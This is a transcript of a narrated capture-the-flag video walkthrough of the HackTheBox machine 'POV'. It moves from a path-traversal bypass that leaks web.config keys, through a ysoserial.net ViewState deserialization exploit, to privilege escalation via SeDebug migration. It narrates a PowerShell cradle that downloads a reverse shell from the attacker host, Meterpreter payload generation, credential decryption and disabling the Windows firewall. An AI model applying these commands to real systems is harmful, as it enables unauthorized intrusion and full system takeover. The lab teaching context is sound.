What's going on YouTube? This is IPSec. We're doing POV from HackTheBox, which is a medium rated Windows machine that doesn't have any Active Directory but is a lot of fun. It can be a little bit more challenging than intended if you just don't know some silly Windows quirks, and I'll do my best to showcase those in this video. The first one being with the foothold that involves whysocrl.net. There's a deserialization attack that isn't too tough, but if you use command prompt with this executable and use single quotes, it's just not going to work because command prompt doesn't treat single quotes as quotation marks, and it's not clear exactly why it's not working when you do it. You can run into a lot of issues. Once you get a foothold on the box, you find credentials to another user. When you log in as that user, you have SeDebug privilege. If you use like the PowerShell Invoke-Command, then the debug permission will always be disabled, and I can't find a way to enable it again. But if you use Meterpreter or chisel and pivot with Evil-WINRM, it works. But with all that being said, let's just jump in because it'll make much more sense when we can show it off. As always, we're going to start off with an nmap. So -sc for default scripts, sv, enumerate version, -vv for double verbose. This gets us the TTL and things like that. OA, output all formats, put in the nmap directory and call it POV. Then the IP address of 10.10.11.251. This can take some time to run, so I've already ran it. Looking at the results, we have just one port open. That is HTTP on port 80, and it is an IIS web server. We have the HTTP title saying it's POV.hdb, so we have the leaked host name there, but let's just go take a look at the website. We could also do like a full nmap to see all the other ports that are open, if there are any, but when nmap just tells me one port, I like looking at that first before I go digging other places. So just going to POV.hdb or 10.10.11.251, we get just a boilerplate website. And I don't see too much here. I wonder if this is like HTML or whatnot. There is a contact us that has sfits at pov.hdb, so we have a potential username here. But since we don't have SMB or anything like that, we can't really spray anything. We could test this login form. So if we do ipsec root at ipsec.rocks test, and I'm going to send this over to Burp Suite just to see if it sends any data, if this is a working contact us form. And it doesn't look like it is. We sent it and it sent no data. So the contact us is a sham, but there is also a dev.pov.hdb. So let's go take a look at that. I'm going to do sudo v etc host so we can add this to our host file. So 10.10.11.251 dev pov.hdb, and let's just add pov.hdb for good measure. And I'm going to just test pov.hdb really quick to make sure it's the same site we expect. It is. So now let's take a look at what dev is. So dev pov.hdb. And we probably should run GoBuster or something in the background on pov.hdb to see if like we can get any interesting information out of it. Index HTML is that, ASD. So this is just a static website with index.html. If we go to dev, it redirects us to portfolio. And looking at this, it looks like it is an online resume for Steven Fitz, which is the user on pov.hdb. There is a link to download CV, and it's doing some weird JavaScript thing right there. And doesn't look like much else. So let's go take a look at this download CV link. Am I still intercepting? Clicking on it. And we can see it does a post request to portfolio. And then we have a bunch of parameters. So this is going to be ASPX or .NET, just because I see like ViewState and things like that. And it does get the file cv.pdf. And we have what looks like to be a resume. So let's go back real quick. And I'm going to look at that request again. I'm just going to send it over to repeater, and I thought it would be right at the top of that, but I guess not. Let's just intercept and click. And then let's play with this, right? So we got file cv.pdf. If we do, let's try index.aspx, would that be? We get a found, it redirects us to default.aspx, and we have the error path portfolio default aspx. So default is another like index just for Windows, right? IIS does use default a lot. So we do that and we get the page. And it doesn't look like it's a local file include because it's actually displaying this. If it was actually executing code, I don't think we'd see this header. So we can include files off the server. And whenever I get a file disclosure on Windows IIS, I always go for the web config directory because you may get a quick win there. So I want to go take a look at where I am. If I go to Portfolio CV PDF, we get the file. So I know I'm in this directory, right? Because there's also default ASPX here as well. I want to go up one. So let's go to repeater and I'm going to try /web.config. And we just get the error. So it's going to default ASPX. Let's see if there's a default ASPX in this root file, like up one from folder. And we get what looks like the same exact file. I'm going to look at 21,264 bytes down in the bottom right. And then, come on, go away. I don't know why that's highlighting. There we go. 21,264. So those are the same. So what is happening is it's removing this. Either it's going to remove like all directory characters, or it just has a replace on .. And I'm going to test for the replace on .. by adding another .. in the middle of it. Because when you do replace commands, they're not recursive. So they're not going to run over and over again. So when it removes this .. it will just leave this one and we'll get it. So run this and we have an error. I'm going to try web.config just in case there's no default in the index. And we do get it. So all the web server is doing is removing the .. So now we just have a web config. So let's make dir exfil, I guess, v web config, and I'll paste this. Let's do a set paste. Man, we have all those new lines. That's annoying. I'll just get rid of those quickly because it's easier for me to see without them. Okay, and we also have all the keys. There is a way in IIS to just have this auto-generate, so the keys get generated every time the web server starts up. And when it does that, you won't have this information in the config, which means you won't be able to do the next step, and that is use this to create a malicious ViewState gadget here and get code execution on the server. And to do that, we're going to use why-so-serial. And this sounds super complicated, but it's relatively easy once you see you have a decryption key and a validation key. But we will need to go over to Windows, so I'm going to do that now by just going up here. And we'll go over to my Windows machine, and you just Google why-so-serial.net. It's right on GitHub. You can download it. I'm also going to switch over to CMD because there's a weird Windows quirk. And CMD doesn't treat quotation marks as quotes, it treats it as characters. And when I was doing this box, I actually ran into that and was scratching my head for quite a long time. And eventually I asked OXDF for help, and we discovered it was my quotation mark that was causing an issue, and we were just baffled. It doesn't affect PowerShell, it only affects CMD. But I run why-so-serial, we look at plugins, and if you go up, you can see like example syntax. But the key thing is plugins. We want to do ViewState, so I'll do -p, ViewState, and then we can just do -- examples to get a bunch of examples. I'm going to do the top one, so let's just copy this, and I'm going to do the command at the end so we can easily change it. The path, we want to put probably /portfolio, and then what we want is the app path, and that's just going to be /. And now we can say the decryption algorithm AES, the decryption key, and we want to go back here. And where is the decryption key? We can copy and paste. Okay. And then let's see, after decryption key, we need the validation algorithm. And the example uses hmac SHA-1. If you look at the web config, it's just SHA-1. So I'll put that. And then we want the validation key. We go back over here, and you can see the validation algorithm is right there. But here's the key. We can copy, paste this. Okay. And then we can do the -C for the command, and we're going to do ping 10.10.14.8. And when I was doing this box, I went straight to a PowerShell command, which is why I was using the single quote, because it made sense visually to me. But that caused me a lot of just troubleshooting. So now that we have this, let's do sudo tcp dump -n for no DNS, -i ton 0 ICMP. And then we can put the malicious view state here. And when I send this, we should see 4 pings come in because Windows by default pings 4 times. So now if we went all the way back and I changed these quotation marks to be single quotes, and then we copy and paste this, it's not going to work. And if it works, I'm going to be really sad because I was 90% sure this is it. So we can copy and paste here. You see that? We get nothing. Now, if I take this command, I will copy the entire command. We're going to go over to PowerShell. We still have the single quotes there. We're going to run this. And we're going to get it sending us pings. So command does not like single quotes. So maybe you should always be in PowerShell, or just when you're in command, make sure you realize that. So now that we have a way to run commands, let's get a web shell. So you could do this without a web cradle, but I really like using web cradles just because you know the command executed. If you just try to send the reverse shell straight, you don't know if it executed or not, right? So I'm going to make the www directory. Then we go user share. Is it Nashang, PowerShell, or is it shells? Invoke, PowerShell, TCP, one line, PS1. I'll call it shell.ps1. And then let's make this. And we can say 10.10.14.8, 9001. So you could just convert this shell.ps1 to base64 and then send it that way. But again, I like using web cradles. So we'll do IEX, new object, net.web client, download string, HTTP 10.10.14.8, port 8000. We'll call this shell.ps1, like that. Okay. So we can cat cradle, and PowerShell always likes it in UTF-16 little endian. And then we can do base64-w0. And again, you could just do that whole command on the shell.ps1 file and avoid having it on a web server. But if antivirus picks it up, you'll never know antivirus picked it up. The benefit to doing it this way is antivirus won't flag on the web cradle. It will flag after the web cradle. So, yeah. So I'm going to copy this command, and then we're going to see if we get a reverse shell. So I'm going to do rl wrap nc lvnp 9001, go up here and paste this. We have a hit and we have a shell. There we go. So whenever you pop a Windows web server or service, I always like checking the whoami/priv to see if I have like any of the like SE impersonate services or things like that. And we don't have any dangerous permissions. If we go in, let's see, we can do like a netstat command. If we do netstat-an, we can see all the open ports. Here would tell me like if there's a database running like MS-SQL or MySQL or things like that. I don't really see anything. We do see like WinRM, SMB, and those things. So there is definitely a firewall in play because nmap did not see these things. But nothing too interesting on the ports. If I do who am I, we are the sfits user. So the web service is definitely running as sfits. Let's see. We could do dir. Let's go in inap pub. Then www root. Let's see, what is there? If we go to public, we have a web.config and public as well, index.html. Let's see. cd dev, portfolio. I wonder if we can write in public. cd public echo test to test. It does not look like we can. I think if I do at 2 and 1, nope, we don't see error messages, but we cannot write in the public directory. I was thinking maybe we could drop a web shell here and see if this service is running as a different user, right? If we look at this, there is no key, so we can't even exploit that. So we're at kind of a loss. We could go in sfits's home directory, right? So since we're running as sfits, let's see if we do a dir on desktop, nothing there. Dir on documents, and we have a connection.xml. So if we type documents connection.xml, we have what looks to be a encoded password. This is just the system management automation PS credential object. And since we're on this box, we can easily reverse this. We could just run like the import CLI XML command and import this file and then do it that way, but I don't like doing it that way. I like just doing it the manual way, which is just creating a password. So we'll make sure this is copied and say convert to secure string and paste this. If I do pwd, that is now a system security secure string. So now I can create the credential object. So we'll do new object, system management, automation, PS credential. We give it the argument list and the username. Shoot, what was that used that this went to? Let's see. Was it type documents connection.xml maybe? Aladding. ALAADING. And then the password, which we called it PWD. So now if I look at cred, we have that, and we can do cred.get network credential and password. And that is the decrypted form of password. So we have Aladding's password, or as long as this is valid. So we can say v creds.text Aladding and copy this. And we could quickly test if this is valid by doing like a Invoke-Command. Is it host, localhost, credential, cred, script block, who am I? That did not work. I thought that would. Do we put this in quotes? What is the error message here? Is there no ALAADING? That is looking right. Oh, computer name probably. There we go. So we can successfully run commands as Aladding. And we could also go and do a PowerShell command. So we do PowerShell-enc. Where was that? We can just do that iconv command again. iConvert. What do we call it? Cradle. There we go. Run that shell. We see it hit. And we get a shell as Aladding. And this invoke command is not going to give us a shell back until this one finishes. And one thing we notice as this Aladdin user, if we do whoami/priv, we have the SeDebug privilege. It's listed, it's disabled, and we should be able to enable this, but I did a lot of like playing around. I could not get it enabled when I do this Invoke-Command. So for example, if we went and said, let's see, there's probably like a security policy on it being a remote connection, but hold on. Enable privileges PowerShell will bring us to a script that should do it. Go back, that's not what I want. Enable privilege.ps1. Is this? Yeah, this should do it. I also tried a script called like enable all privileges and it didn't work, but we'll try this one. So we'll do wget on this. Then we can ix, new object, net.web client, download string, HTTP 10.10.14.8, port 8000, enable privilege.ps1. We made the get. So we should be able to just do enable privilege and then specify the privilege. So I'll copy this and we'll replace that with backup or a debug. Debug privilege. And then whoami/priv, and it's still disabled. It should be enabled here. And then if this is enabled, if we had a good shell to the box, we would be able to run a command called PSGetSys, and that would allow us to root the box. And at the end of the video, I'll show one odd thing that I don't know why it's not working, but another way we can abuse the debug permission is if we had Meterpreter, and that will enable us to use the migrate command, because the debug lets you debug a process, and that's what's needed to migrate in Meterpreter or any type of C2 framework. It's very tough to do a migrate in PowerShell, but Meterpreter will make it super easy for us. So let's just switch to that. And then I'm going to do RunasCS to get a good shell and show that PSGetSys fails there. But if we like logged in locally to the box and did it, it works there. So it's an odd behavior that we'll go into. So where were we? We want to get Meterpreter. So I'm going to do msfvenom-p Windows x64 Meterpreter reverse TCP. Then lhost is equal to ton0, lport is equal to, we'll do 9002. Format's going to be exe, and we'll call it meterpreter.exe. And while that's going, we can do sudo msfdb run, and this is going to initialize Metasploit for us, hopefully. Okay, it is starting. Let's move Meterpreter to www, and let's go to program data. And let's see, we can curl HTTP 10.10.14.8, port 8000, meterpreter.exe-o, meterpreter.exe. I actually don't know if it's going to work when we're executing in this PowerShell session. We'll see. Let's see, use exploit multi-handler, and then set lhost is equal to ton0, set lport 9002, set payload. We will copy this and then run. Execute meterpreter.exe. We should get a session. And then if we say get privs, we do not have the debug. And I think that's because we are in this PowerShell session. So we want to get out of there. And I'm going to upload RunasCS, because that's going to allow us to run as a different user. Do I have it? Locate RunasCS. We can just copy it here. And again, you can just Google this on GitHub to get a copy. Oh, I don't have it. There we go. Move RunasCS to dub. Let's just do another netcat. Send the reverse shell again. Go in and program data, curl, HTTP 10.10.14.8, runascs.exe. Output it there. I don't know why it's not running. Did not download. Curl 10.10.14.8. Oh, I didn't specify port 8000. Okay. So we should now be able to do runascs. And then was it Aladding? We want creds, ALAADING. Okay. And then let's just verify it works. It does. Where is reverse? There's a way to just have it send a shell. Okay, so we can do CMD and then -R 10.10.14.8 9001. Okay, so now if I do whoami/priv, we have SeDebug is disabled. But when you go into PowerShell from this, and then we do whoami/priv, it enables itself. It's just a weird thing that happens when you run in PowerShell. But you don't have to be in PowerShell. If we execute Meterpreter from this position, let's exit this, run. Once it goes, we can run get privs again. And we have the SeDebug. So again, when you use Invoke-Command, you may be under more restrictions than you expect, right? So using RunasCS to switch users makes it so we log in more interactively to the box, which lets us do this SeDebug thing, right? So all we have to do is get a list of processes on the box, find one that's running as system or administrator, and then we can migrate to it. So let's see, what is a good one to do? VMware tools, probably. We can do 624. So I do migrate 624. We're migrating, access is denied. So maybe not that one. I actually don't know why we couldn't do that. We can do 476 winlogon.exe. Migrate 476. Was that it? 476. Oh. I was doing a parent PID, not PID. Where was that VM tools? We were trying to do this. So maybe 2336. 476 is probably like CRS, or that's like a protected process, I'm guessing. There we go. So if we do shell, who am I? We're now NT authority system. So we can go users, administrator, desktop. And we can get root.txt. Now, I want to show something that is also puzzling me. If we do, where was it? It was the script. This should also allow us to do it from PowerShell, but the shell we had, for some reason, just does not work. So I'm going to wget. We will run this. I'm going to do PowerShell. And this is where I'm doing the like RunasCS thing, right? I think if I do -B, I can get that to be enabled. I think that's a UAC thing. I'm going to run this again. I'm going to specify -B. If we do PowerShell, okay, they're all enabled. So we can increase our working set privilege if we want. We also have debug. So I'm going to do IEX, new object, then net.web client, download string, HTTP 10.10.14.8. What was it called? PSGetSys .ps1. Again, I forgot to do port 8000. There we go. And that gives us this command. So we can impersonate from parent PID. So if I run this, I'm going to use the same PID we did to the migrate. So we can say 2336. And then what else is it? Was it -command? Command, CMD, then is it CMD args? Would say PowerShell. We'll just do a ping. Sudo TCP dump -I ton 0. Let's also do -n. Am I getting pings? No. Okay. It pinged. Oh, I did not do ICMP. That's why. Let's see. Parameter cannot be found. I did --. And that's not the last error I was getting before. Weird. Last error 2. What is that? Windows error codes. Is that like permission? 2. File not found. Okay, 122. This is what I was saying. And this is like insufficient buffer. Don't understand that. We don't have a ping. If we did this from Evil-WINRM as the same user, it'll work. And you could do Evil-WINRM if you use chisel to tunnel. But since I'm already here, I'm just going to run netsh adv firewall set all profiles state off. There we go. So now I can just do Evil-WINRM -u aladding -p, put in this password, and then -I POV HTTP. We'll get the shell. Who am I /priv. Oddly enough, from this Evil-WINRM session, even though we did Invoke-Command, it did not have it. Evil-WINRM does have SeDebug. I'm going to copy and paste the things we did before. So I'm going to copy this. And then we will copy this. Before I hit enter, we see no pings. Hit enter. And we still don't have any pings. Did not expect that. So it definitely finds cmd.exe. We can do Windows System 32 like this. Oh. cmd args ping 10.10.14.8. I forgot to do that. There we go. We have pings. So let's add the word I forgot here. Ping. And we don't get anything. It's literally the same command. We do have the permission. If we do whoami/priv, we have it. I just don't understand it. But again, it goes to show, like, if you run into errors, try it with different shells, because you may be surprised at the results, right? So we run this. Let's try it. Yep, worked again. Now, I wonder, what if we did it from Meterpreter? So let's go cd program data /meterpreter.exe. It's sending the stage. Oh, how do I load PowerShell? I wonder if it's default now. Load PowerShell Meterpreter. It's like PWSH or something. Let's see. Starting Meterpreter, load PowerShell. Okay. I never got my shell. There it is. I do not want that. Load PowerShell. PowerShell shell. Okay. Where was that IEX command? And then we can run this. So it doesn't look like this is going to work. But I bet if I ran it from my Evil-WINRM session from Meterpreter, it would magically work. I don't know why it's actually hanging, though. I did not expect it to hang like this. Terminate the channel. Let's see. Ten 14.8. Huh. That killed my beacon. Let's run it from WinRM. Setting stage. For some reason, this is taking longer to get my Meterpreter session than it was earlier. I guess that's okay. Copy this while we wait. Come on. Okay. So now I can do load PowerShell. And we can do PowerShell shell. Import this. I'm going to run whoami, just make sure we still have our shell. And we're going to try this command again. Looking here, no pings. Came back. And we still don't have any. So just a really weird behavior from this one script, I guess. But the easiest way to do it is git Meterpreter so you can go and migrate, right? Because if we do git UID, you can see I'm adding git privs, and then we just migrate into that. Let's do a different one. We can do when login, that's 476. I always read that second one. When log on, 552. And this will migrate us into that process. Hopefully. Yep. And then shell, who am I? Or if we wanted to, we could have just done the git UID command again. So that's going to be the box. I can't explain why the PSGetSys is so flaky and why you need to do it on Evil-WINRM for it to be consistent. I just played around with multiple ways, and that was the only way that command worked. It also works if you like remote desktop into the machine and run it from a console. It just doesn't like a lot of reverse shells, but Evil-WINRM is one of the reverse shells it likes, which is mind-boggling to me. So with that being said, take care all, and I will see you all next time.